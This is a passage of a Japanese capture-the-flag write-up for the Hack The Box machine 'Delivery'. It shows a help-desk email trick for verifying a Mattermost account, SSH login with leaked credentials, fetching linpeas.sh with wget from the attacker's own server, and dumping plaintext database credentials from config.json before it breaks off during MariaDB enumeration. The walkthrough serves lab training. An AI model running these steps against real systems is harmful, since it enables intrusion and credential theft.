まえがき
この記事はDeliveryのWriteupです📝
今回はいつもと違うアプローチをしていく特徴的なboxです。
Machine Info
Name: Delivery
IP Address:10.10.10.222
OS: Linux 🐧
Recon
Port Scan - Nmap
┌──(kali㉿kali)-[~/Desktop/work]
└─$ nmap 10.10.10.222 -Pn -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 05:28 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:28
Completed NSE at 05:28, 0.00s elapsed
Initiating NSE at 05:28
Completed NSE at 05:28, 0.00s elapsed
Initiating NSE at 05:28
Completed NSE at 05:28, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 05:28
Completed Parallel DNS resolution of 1 host. at 05:28, 0.04s elapsed
Initiating Connect Scan at 05:28
Scanning 10.10.10.222 [1000 ports]
Discovered open port 80/tcp on 10.10.10.222
Discovered open port 22/tcp on 10.10.10.222
Increasing send delay for 10.10.10.222 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.10.222 from 5 to 10 due to max_successful_tryno increase to 5
Completed Connect Scan at 05:28, 40.94s elapsed (1000 total ports)
Initiating Service scan at 05:28
Scanning 2 services on 10.10.10.222
Completed Service scan at 05:29, 7.13s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.222.
Initiating NSE at 05:29
Completed NSE at 05:29, 8.36s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 1.12s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Nmap scan report for 10.10.10.222
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.05 seconds
22番と80番のポートが開いていることがわかる。
Name Resolution
名前解決を行う必要がある。
/etc/hostsのファイルにこれを書き込んでおく
10.10.10.222 delivery.htb
Site - delivery.htb
実際アクセスしてみるとこんなページが見つかる。
Help Desk
Contact us
Matter most Server
Enumeration
他にもめぼしいものがないか探索していく。
FFuF
┌──(kali㉿kali)-[~/Desktop/work]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.10.222/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.222/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [1/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00]:: Progress: [40/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00:: Progress: [40/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00:: Progress: [40/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00:: Progress: [40/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00:: Progress: [40/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 308ms]
:: Progress: [41/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# on at least 3 different hosts [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 307ms]
:: Progress: [42/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 308ms]
:: Progress: [43/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# directory-list-2.3-small.txt [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 308ms]
:: Progress: [52/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 313ms]
:: Progress: [53/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 309ms]
:: Progress: [53/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00 [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 313ms]
:: Progress: [64/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00images [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 314ms]
:: Progress: [67/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 313ms]
:: Progress: [68/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 314ms]
:: Progress: [69/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 314ms]
:: Progress: [70/87664] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 315ms]
dirsearch
┌──(kali㉿kali)-[~/Desktop/work]
└─$ dirsearch -u http://delivery.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Desktop/work/reports/http_delivery.htb/_23-12-23_05-38-13.txt
Target: http://delivery.htb/
[05:38:13] Starting:
[05:39:03] 403 - 571B - /assets/
[05:39:03] 301 - 185B - /assets -> http://delivery.htb/assets/
[05:39:24] 301 - 185B - /error -> http://delivery.htb/error/
[05:39:24] 200 - 1KB - /error/
[05:39:33] 403 - 571B - /images/
[05:39:33] 301 - 185B - /images -> http://delivery.htb/images/
[05:40:04] 200 - 648B - /README.MD
Task Completed
errorページが気になったが、特筆することはなかったので先ほど見つけたページを詳しく見ていくことにする。
Help Desk
ここから、Open a New Ticket Check Ticket Status Sign Inができる。
ここから新しいチケット発行ができる。試しに入力してみよう。
ticket idとemail addressが発行された。
作ったチケットをCheck Ticket Statusで確認する。
testと入力されている。
他にもMatter most Serverのページがあったのを思い出した。そちらにも再度アクセスしてみよう。
アカウントを持っていないため、Create one newから新規アカウントを作成する。
ここで問題発生。test@testのメールアドレスは実際には存在しないアドレスになるため、email認証をすることが不可能だ。
そこで先ほどチケットを発行した際にもらったemail Addressで、もう一度登録を試してみる。
Check Ticket Statusを更新してみると、verify emailが届いている。
http://delivery.htb:8065/do_verify_email?token=wuzojdkgk7camh58mpgookks8y1y8fs5ohbtfzhkd9obd9dxotfr7y6phpph8kfr&email=1794827%40delivery.htb
mailに届いていたurlにアクセスすると認証が完了するので、再度ログインを試す。
Mattermost
ログインに成功。
チャットログに情報源になりそうなものが沢山書かれている。
① Credentials to the server are maildeliverer:Youve_G0t_Mail!
② Especially those that are a variant of "PleaseSubscribe!"
③ PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.
Attempt - SSH connection
22番ポートが空いていたので、maildeliverer:Youve_G0t_Mail!でSSH接続をしてみる。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
成功した。User Flagもゲット。
maildeliverer@Delivery:~$ ls -lta
total 28
-r-------- 1 maildeliverer maildeliverer 33 Dec 22 15:23 user.txt
drwxr-xr-x 3 maildeliverer maildeliverer 4096 Jan 3 2021 .
lrwxrwxrwx 1 root root 9 Dec 28 2020 .bash_history -> /dev/null
drwx------ 3 maildeliverer maildeliverer 4096 Dec 28 2020 .gnupg
-rw-r--r-- 1 maildeliverer maildeliverer 220 Dec 26 2020 .bash_logout
-rw-r--r-- 1 maildeliverer maildeliverer 3526 Dec 26 2020 .bashrc
-rw-r--r-- 1 maildeliverer maildeliverer 807 Dec 26 2020 .profile
drwxr-xr-x 3 root root 4096 Dec 26 2020 ..
maildeliverer@Delivery:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のUserFlag
Privilege Escalation
sudo -l
maildelivererが実行できる権限を確認してみるが、特にsudo -lでは発見できなかった。
maildeliverer@Delivery:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for maildeliverer:
Sorry, user maildeliverer may not run sudo on Delivery.
Linpeas
LinPeasを使っていくため、前準備をする。
① サーバをたてておく
┌──(kali㉿kali)-[~/Desktop/work]
└─$ python3 -m http.server 80 --bind 10.10.14.4
Serving HTTP on 10.10.14.4 port 80 (http://10.10.14.4:80/) ...
② LinPeasをダウンロード(サーバをたてた同じ階層で)しておく。
③ ターゲットマシンでwgetを実行しlinpeas.shを手にいれる。
maildeliverer@Delivery:~$ wget http://10.10.14.4:80/linpeas.sh
--2023-12-22 16:53:28-- http://10.10.14.4/linpeas.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===============>] 827.94K 6.79KB/s in 2m 59s
2023-12-22 16:56:28 (4.63 KB/s) - ‘linpeas.sh’ saved [847815/847815]
④ そのまま実行しようとしても権限が与えられていないので、権限を与えておく。
maildeliverer@Delivery:~$ chmod +x linpeas.sh
⑤ 実行 (今日もかわいい...)
情報量が多いが、特に気になった点は以下の通りだ。
Users with console
MySQL
他にも気になる点が沢山あったが、特に脆弱性は存在しなかった。
ディレクトリを調べていると、ディレクトリ内にconfig.jsonというファイルを見つけた。
内容を見てみよう。
maildeliverer@Delivery:/opt/mattermost/config$ ls -lta
total 36
-rw-rw-r-- 1 mattermost mattermost 18774 Dec 22 15:23 config.json
drwxrwxr-x 12 mattermost mattermost 4096 Jul 14 2021 ..
drwxrwxr-x 2 mattermost mattermost 4096 Dec 26 2020 .
-rw-rw-r-- 1 mattermost mattermost 922 Dec 18 2020 cloud_defaults.json
-rw-rw-r-- 1 mattermost mattermost 243 Dec 18 2020 README.md
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json
{
"ServiceSettings": {
"SiteURL": "",
"WebsocketURL": "",
"LicenseFileLocation": "",
"ListenAddress": ":8065",
"ConnectionSecurity": "",
"TLSCertFile": "",
"TLSKeyFile": "",
"TLSMinVer": "1.2",
"TLSStrictTransport": false,
"TLSStrictTransportMaxAge": 63072000,
"TLSOverwriteCiphers": [],
"UseLetsEncrypt": false,
"LetsEncryptCertificateCacheFile": "./config/letsencrypt.cache",
"Forward80To443": false,
"TrustedProxyIPHeader": [],
"ReadTimeout": 300,
"WriteTimeout": 300,
"IdleTimeout": 60,
"MaximumLoginAttempts": 10,
"GoroutineHealthThreshold": -1,
"GoogleDeveloperKey": "",
"EnableOAuthServiceProvider": false,
"EnableIncomingWebhooks": true,
"EnableOutgoingWebhooks": true,
"EnableCommands": true,
"EnableOnlyAdminIntegrations": true,
"EnablePostUsernameOverride": false,
"EnablePostIconOverride": false,
"EnableLinkPreviews": true,
"EnableTesting": false,
"EnableDeveloper": false,
"EnableOpenTracing": false,
"EnableSecurityFixAlert": true,
"EnableInsecureOutgoingConnections": false,
"AllowedUntrustedInternalConnections": "",
"EnableMultifactorAuthentication": false,
"EnforceMultifactorAuthentication": false,
"EnableUserAccessTokens": false,
"AllowCorsFrom": "",
"CorsExposedHeaders": "",
"CorsAllowCredentials": false,
"CorsDebug": false,
"AllowCookiesForSubdomains": false,
"ExtendSessionLengthWithActivity": true,
"SessionLengthWebInDays": 30,
"SessionLengthMobileInDays": 30,
"SessionLengthSSOInDays": 30,
"SessionCacheInMinutes": 10,
"SessionIdleTimeoutInMinutes": 43200,
"WebsocketSecurePort": 443,
"WebsocketPort": 80,
"WebserverMode": "gzip",
"EnableCustomEmoji": true,
"EnableEmojiPicker": true,
"EnableGifPicker": true,
"GfycatApiKey": "2_KtH_W5",
"GfycatApiSecret": "3wLVZPiswc3DnaiaFoLkDvB4X0IV6CpMkj4tf2inJRsBY6-FnkT08zGmppWFgeof",
"RestrictCustomEmojiCreation": "all",
"RestrictPostDelete": "all",
"AllowEditPost": "always",
"PostEditTimeLimit": -1,
"TimeBetweenUserTypingUpdatesMilliseconds": 5000,
"EnablePostSearch": true,
"MinimumHashtagLength": 3,
"EnableUserTypingMessages": true,
"EnableChannelViewedMessages": true,
"EnableUserStatuses": true,
"ExperimentalEnableAuthenticationTransfer": true,
"ClusterLogTimeoutMilliseconds": 2000,
"CloseUnusedDirectMessages": false,
"EnablePreviewFeatures": true,
"EnableTutorial": true,
"ExperimentalEnableDefaultChannelLeaveJoinMessages": true,
"ExperimentalGroupUnreadChannels": "disabled",
"ExperimentalChannelOrganization": false,
"ExperimentalChannelSidebarOrganization": "disabled",
"ExperimentalDataPrefetch": true,
"ImageProxyType": "",
"ImageProxyURL": "",
"ImageProxyOptions": "",
"EnableAPITeamDeletion": false,
"EnableAPIUserDeletion": false,
"ExperimentalEnableHardenedMode": false,
"DisableLegacyMFA": true,
"ExperimentalStrictCSRFEnforcement": false,
"EnableEmailInvitations": false,
"DisableBotsWhenOwnerIsDeactivated": true,
"EnableBotAccountCreation": false,
"EnableSVGs": false,
"EnableLatex": false,
"EnableAPIChannelDeletion": false,
"EnableLocalMode": false,
"LocalModeSocketLocation": "/var/tmp/mattermost_local.socket",
"EnableAWSMetering": false,
"SplitKey": "",
"FeatureFlagSyncIntervalSeconds": 30,
"DebugSplit": false,
"ThreadAutoFollow": true,
"ManagedResourcePaths": ""
},
"TeamSettings": {
"SiteName": "Mattermost",
"MaxUsersPerTeam": 5000,
"EnableTeamCreation": true,
"EnableUserCreation": true,
"EnableOpenServer": true,
"EnableUserDeactivation": false,
"RestrictCreationToDomains": "",
"EnableCustomBrand": false,
"CustomBrandText": "",
"CustomDescriptionText": "",
"RestrictDirectMessage": "any",
"RestrictTeamInvite": "all",
"RestrictPublicChannelManagement": "all",
"RestrictPrivateChannelManagement": "all",
"RestrictPublicChannelCreation": "all",
"RestrictPrivateChannelCreation": "all",
"RestrictPublicChannelDeletion": "all",
"RestrictPrivateChannelDeletion": "all",
"RestrictPrivateChannelManageMembers": "all",
"EnableXToLeaveChannelsFromLHS": false,
"UserStatusAwayTimeout": 300,
"MaxChannelsPerTeam": 2000,
"MaxNotificationsPerChannel": 1000000,
"EnableConfirmNotificationsToChannel": true,
"TeammateNameDisplay": "username",
"ExperimentalViewArchivedChannels": true,
"ExperimentalEnableAutomaticReplies": false,
"ExperimentalHideTownSquareinLHS": false,
"ExperimentalTownSquareIsReadOnly": false,
"LockTeammateNameDisplay": false,
"ExperimentalPrimaryTeam": "",
"ExperimentalDefaultChannels": []
},
"ClientRequirements": {
"AndroidLatestVersion": "",
"AndroidMinVersion": "",
"DesktopLatestVersion": "",
"DesktopMinVersion": "",
"IosLatestVersion": "",
"IosMinVersion": ""
},
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},
"LogSettings": {
"EnableConsole": true,
"ConsoleLevel": "INFO",
"ConsoleJson": true,
"EnableFile": true,
"FileLevel": "INFO",
"FileJson": true,
"FileLocation": "",
"EnableWebhookDebugging": true,
"EnableDiagnostics": true,
"EnableSentry": true,
"AdvancedLoggingConfig": ""
},
"ExperimentalAuditSettings": {
"FileEnabled": false,
"FileName": "",
"FileMaxSizeMB": 100,
"FileMaxAgeDays": 0,
"FileMaxBackups": 0,
"FileCompress": false,
"FileMaxQueueSize": 1000,
"AdvancedLoggingConfig": ""
},
"NotificationLogSettings": {
"EnableConsole": true,
"ConsoleLevel": "INFO",
"ConsoleJson": true,
"EnableFile": true,
"FileLevel": "INFO",
"FileJson": true,
"FileLocation": "",
"AdvancedLoggingConfig": ""
},
"PasswordSettings": {
"MinimumLength": 10,
"Lowercase": true,
"Number": true,
"Uppercase": true,
"Symbol": true
},
"FileSettings": {
"EnableFileAttachments": true,
"EnableMobileUpload": true,
"EnableMobileDownload": true,
"MaxFileSize": 52428800,
"DriverName": "local",
"Directory": "./data/",
"EnablePublicLink": false,
"PublicLinkSalt": "8818u8uiz1n9rykuwgiqttfzgu6iixhz",
"InitialFont": "nunito-bold.ttf",
"AmazonS3AccessKeyId": "",
"AmazonS3SecretAccessKey": "",
"AmazonS3Bucket": "",
"AmazonS3PathPrefix": "",
"AmazonS3Region": "",
"AmazonS3Endpoint": "s3.amazonaws.com",
"AmazonS3SSL": true,
"AmazonS3SignV2": false,
"AmazonS3SSE": false,
"AmazonS3Trace": false
},
"EmailSettings": {
"EnableSignUpWithEmail": true,
"EnableSignInWithEmail": true,
"EnableSignInWithUsername": true,
"SendEmailNotifications": false,
"UseChannelInEmailNotifications": false,
"RequireEmailVerification": true,
"FeedbackName": "",
"FeedbackEmail": "",
"ReplyToAddress": "",
"FeedbackOrganization": "",
"EnableSMTPAuth": false,
"SMTPUsername": "",
"SMTPPassword": "",
"SMTPServer": "localhost",
"SMTPPort": "1025",
"SMTPServerTimeout": 10,
"ConnectionSecurity": "",
"SendPushNotifications": true,
"PushNotificationServer": "https://push-test.mattermost.com",
"PushNotificationContents": "full",
"PushNotificationBuffer": 1000,
"EnableEmailBatching": false,
"EmailBatchingBufferSize": 256,
"EmailBatchingInterval": 30,
"EnablePreviewModeBanner": true,
"SkipServerCertificateVerification": false,
"EmailNotificationContentsType": "full",
"LoginButtonColor": "#0000",
"LoginButtonBorderColor": "#2389D7",
"LoginButtonTextColor": "#2389D7"
},
"RateLimitSettings": {
"Enable": false,
"PerSec": 10,
"MaxBurst": 100,
"MemoryStoreSize": 10000,
"VaryByRemoteAddr": true,
"VaryByUser": false,
"VaryByHeader": ""
},
"PrivacySettings": {
"ShowEmailAddress": true,
"ShowFullName": true
},
"SupportSettings": {
"TermsOfServiceLink": "https://about.mattermost.com/default-terms/",
"PrivacyPolicyLink": "https://about.mattermost.com/default-privacy-policy/",
"AboutLink": "https://about.mattermost.com/default-about/",
"HelpLink": "https://about.mattermost.com/default-help/",
"ReportAProblemLink": "https://about.mattermost.com/default-report-a-problem/",
"SupportEmail": "feedback@mattermost.com",
"CustomTermsOfServiceEnabled": false,
"CustomTermsOfServiceReAcceptancePeriod": 365,
"EnableAskCommunityLink": true
},
"AnnouncementSettings": {
"EnableBanner": false,
"BannerText": "",
"BannerColor": "#f2a93b",
"BannerTextColor": "#333333",
"AllowBannerDismissal": true,
"AdminNoticesEnabled": true,
"UserNoticesEnabled": true,
"NoticesURL": "https://notices.mattermost.com/",
"NoticesFetchFrequency": 3600,
"NoticesSkipCache": false
},
"ThemeSettings": {
"EnableThemeSelection": true,
"DefaultTheme": "default",
"AllowCustomThemes": true,
"AllowedThemes": []
},
"GitLabSettings": {
"Enable": false,
"Secret": "",
"Id": "",
"Scope": "",
"AuthEndpoint": "",
"TokenEndpoint": "",
"UserApiEndpoint": ""
},
"GoogleSettings": {
"Enable": false,
"Secret": "",
"Id": "",
"Scope": "profile email",
"AuthEndpoint": "https://accounts.google.com/o/oauth2/v2/auth",
"TokenEndpoint": "https://www.googleapis.com/oauth2/v4/token",
"UserApiEndpoint": "https://people.googleapis.com/v1/people/me?personFields=names,emailAddresses,nicknames,metadata"
},
"Office365Settings": {
"Enable": false,
"Secret": "",
"Id": "",
"Scope": "User.Read",
"AuthEndpoint": "https://login.microsoftonline.com/common/oauth2/v2.0/authorize",
"TokenEndpoint": "https://login.microsoftonline.com/common/oauth2/v2.0/token",
"UserApiEndpoint": "https://graph.microsoft.com/v1.0/me",
"DirectoryId": ""
},
"LdapSettings": {
"Enable": false,
"EnableSync": false,
"LdapServer": "",
"LdapPort": 389,
"ConnectionSecurity": "",
"BaseDN": "",
"BindUsername": "",
"BindPassword": "",
"UserFilter": "",
"GroupFilter": "",
"GuestFilter": "",
"EnableAdminFilter": false,
"AdminFilter": "",
"GroupDisplayNameAttribute": "",
"GroupIdAttribute": "",
"FirstNameAttribute": "",
"LastNameAttribute": "",
"EmailAttribute": "",
"UsernameAttribute": "",
"NicknameAttribute": "",
"IdAttribute": "",
"PositionAttribute": "",
"LoginIdAttribute": "",
"PictureAttribute": "",
"SyncIntervalMinutes": 60,
"SkipCertificateVerification": false,
"PublicCertificateFile": "",
"PrivateKeyFile": "",
"QueryTimeout": 60,
"MaxPageSize": 0,
"LoginFieldName": "",
"LoginButtonColor": "#0000",
"LoginButtonBorderColor": "#2389D7",
"LoginButtonTextColor": "#2389D7",
"Trace": false
},
"ComplianceSettings": {
"Enable": false,
"Directory": "./data/",
"EnableDaily": false
},
"LocalizationSettings": {
"DefaultServerLocale": "en",
"DefaultClientLocale": "en",
"AvailableLocales": ""
},
"SamlSettings": {
"Enable": false,
"EnableSyncWithLdap": false,
"EnableSyncWithLdapIncludeAuth": false,
"IgnoreGuestsLdapSync": false,
"Verify": true,
"Encrypt": true,
"SignRequest": false,
"IdpUrl": "",
"IdpDescriptorUrl": "",
"IdpMetadataUrl": "",
"ServiceProviderIdentifier": "",
"AssertionConsumerServiceURL": "",
"SignatureAlgorithm": "RSAwithSHA1",
"CanonicalAlgorithm": "Canonical1.0",
"ScopingIDPProviderId": "",
"ScopingIDPName": "",
"IdpCertificateFile": "",
"PublicCertificateFile": "",
"PrivateKeyFile": "",
"IdAttribute": "",
"GuestAttribute": "",
"EnableAdminAttribute": false,
"AdminAttribute": "",
"FirstNameAttribute": "",
"LastNameAttribute": "",
"EmailAttribute": "",
"UsernameAttribute": "",
"NicknameAttribute": "",
"LocaleAttribute": "",
"PositionAttribute": "",
"LoginButtonText": "SAML",
"LoginButtonColor": "#34a28b",
"LoginButtonBorderColor": "#2389D7",
"LoginButtonTextColor": "#ffffff"
},
"NativeAppSettings": {
"AppDownloadLink": "https://mattermost.com/download/#mattermostApps",
"AndroidAppDownloadLink": "https://about.mattermost.com/mattermost-android-app/",
"IosAppDownloadLink": "https://about.mattermost.com/mattermost-ios-app/"
},
"ClusterSettings": {
"Enable": false,
"ClusterName": "",
"OverrideHostname": "",
"NetworkInterface": "",
"BindAddress": "",
"AdvertiseAddress": "",
"UseIpAddress": true,
"UseExperimentalGossip": false,
"EnableExperimentalGossipEncryption": false,
"ReadOnlyConfig": true,
"GossipPort": 8074,
"StreamingPort": 8075,
"MaxIdleConns": 100,
"MaxIdleConnsPerHost": 128,
"IdleConnTimeoutMilliseconds": 90000
},
"MetricsSettings": {
"Enable": false,
"BlockProfileRate": 0,
"ListenAddress": ":8067"
},
"ExperimentalSettings": {
"ClientSideCertEnable": false,
"ClientSideCertCheck": "secondary",
"EnableClickToReply": false,
"LinkMetadataTimeoutMilliseconds": 5000,
"RestrictSystemAdmin": false,
"UseNewSAMLLibrary": false,
"CloudUserLimit": 0,
"CloudBilling": false,
"EnableSharedChannels": false
},
"AnalyticsSettings": {
"MaxUsersForStatistics": 2500
},
"ElasticsearchSettings": {
"ConnectionUrl": "http://localhost:9200",
"Username": "elastic",
"Password": "changeme",
"EnableIndexing": false,
"EnableSearching": false,
"EnableAutocomplete": false,
"Sniff": true,
"PostIndexReplicas": 1,
"PostIndexShards": 1,
"ChannelIndexReplicas": 1,
"ChannelIndexShards": 1,
"UserIndexReplicas": 1,
"UserIndexShards": 1,
"AggregatePostsAfterDays": 365,
"PostsAggregatorJobStartTime": "03:00",
"IndexPrefix": "",
"LiveIndexingBatchSize": 1,
"BulkIndexingTimeWindowSeconds": 3600,
"RequestTimeoutSeconds": 30,
"SkipTLSVerification": false,
"Trace": ""
},
"BleveSettings": {
"IndexDir": "",
"EnableIndexing": false,
"EnableSearching": false,
"EnableAutocomplete": false,
"BulkIndexingTimeWindowSeconds": 3600
},
"DataRetentionSettings": {
"EnableMessageDeletion": false,
"EnableFileDeletion": false,
"MessageRetentionDays": 365,
"FileRetentionDays": 365,
"DeletionJobStartTime": "02:00"
},
"MessageExportSettings": {
"EnableExport": false,
"ExportFormat": "actiance",
"DailyRunTime": "01:00",
"ExportFromTimestamp": 0,
"BatchSize": 10000,
"DownloadExportResults": false,
"GlobalRelaySettings": {
"CustomerType": "A9",
"SmtpUsername": "",
"SmtpPassword": "",
"EmailAddress": "",
"SMTPServerTimeout": 1800
}
},
"JobSettings": {
"RunJobs": true,
"RunScheduler": true
},
"PluginSettings": {
"Enable": true,
"EnableUploads": false,
"AllowInsecureDownloadUrl": false,
"EnableHealthCheck": true,
"Directory": "./plugins",
"ClientDirectory": "./client/plugins",
"Plugins": {},
"PluginStates": {
"com.mattermost.nps": {
"Enable": true
},
"com.mattermost.plugin-channel-export": {
"Enable": true
},
"com.mattermost.plugin-incident-management": {
"Enable": true
}
},
"EnableMarketplace": true,
"EnableRemoteMarketplace": true,
"AutomaticPrepackagedPlugins": true,
"RequirePluginSignature": false,
"MarketplaceUrl": "https://api.integrations.mattermost.com",
"SignaturePublicKeyFiles": []
},
"DisplaySettings": {
"CustomUrlSchemes": [],
"ExperimentalTimezone": true
},
"GuestAccountsSettings": {
"Enable": false,
"AllowEmailAccounts": true,
"EnforceMultifactorAuthentication": false,
"RestrictCreationToDomains": ""
},
"ImageProxySettings": {
"Enable": false,
"ImageProxyType": "local",
"RemoteImageProxyURL": "",
"RemoteImageProxyOptions": ""
},
"CloudSettings": {
"CWSUrl": "https://customers.mattermost.com"
}
沢山書き込まれているが、この中で注目すべきは以下の点だ。
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
}
MySQLでログインしてみよう。(PassはCrack_The_MM_Admin_PW)
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 141
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDBとして入ることに成功した。探索していく。
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mattermost]> SHOW tables;
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
| Bots |
| ChannelMemberHistory |
| ChannelMembers |
| Channels |
| ClusterDiscovery |
| CommandWebhooks |
| Commands |
| Compliances |
| Emoji |
| FileInfo |
| GroupChannels |
| GroupMembers |
| GroupTeams |
| IncomingWebhooks |
| Jobs |
| Licenses |
| LinkMetadata |
| OAuthAccessData |
| OAuthApps |
| OAuthAuthData |
| OutgoingWebhooks |
| PluginKeyValueStore |
| Posts |
| Preferences |
| ProductNoticeViewState |
| PublicChannels |
| Reactions |
| Roles |
| Schemes |
| Sessions |
| SidebarCategories |
| SidebarChannels |
| Status |
| Systems |
| TeamMembers |
| Teams |
